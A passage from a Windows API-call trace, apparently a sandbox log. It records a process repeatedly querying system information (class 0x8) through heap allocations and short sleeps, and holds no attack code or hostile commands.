dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0294.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0294.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0294.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.427] Sleep (dwMilliseconds=0x110) [0294.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0294.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0294.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0294.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0294.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0294.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0294.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0294.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0294.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.440] Sleep (dwMilliseconds=0x110) [0294.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0294.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0294.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0294.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0294.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0294.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0294.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.467] Sleep (dwMilliseconds=0x110) [0294.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0294.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0294.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0294.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0294.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0294.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0294.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.487] Sleep (dwMilliseconds=0x110) [0294.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0294.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0294.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0294.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0294.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0294.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0294.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0294.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0294.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.502] Sleep (dwMilliseconds=0x110) [0294.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0294.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0294.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0294.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0294.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0294.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0294.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0294.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0294.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.536] Sleep (dwMilliseconds=0x110) [0294.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0294.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0294.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0294.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0294.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0294.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0294.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.551] Sleep (dwMilliseconds=0x110) [0294.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0294.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0294.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0294.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0294.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0294.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0294.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0294.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0294.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.567] Sleep (dwMilliseconds=0x110) [0294.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0294.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0294.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0294.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0294.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0294.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0294.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0294.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0294.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.581] Sleep (dwMilliseconds=0x110) [0294.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0294.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0294.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0294.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0294.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0294.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0294.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0294.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0294.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.598] Sleep (dwMilliseconds=0x110) [0294.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0294.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0294.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0294.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0294.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0294.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0294.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.611] Sleep (dwMilliseconds=0x110) [0294.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0294.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0294.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0294.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0294.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0294.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0294.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0294.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0294.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.625] Sleep (dwMilliseconds=0x110) [0294.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0294.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0294.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0294.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0294.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0294.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0294.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0294.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0294.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.642] Sleep (dwMilliseconds=0x110) [0294.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0294.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0294.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0294.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0294.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0294.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0294.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0294.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0294.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.673] Sleep (dwMilliseconds=0x110) [0294.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0294.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0294.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, 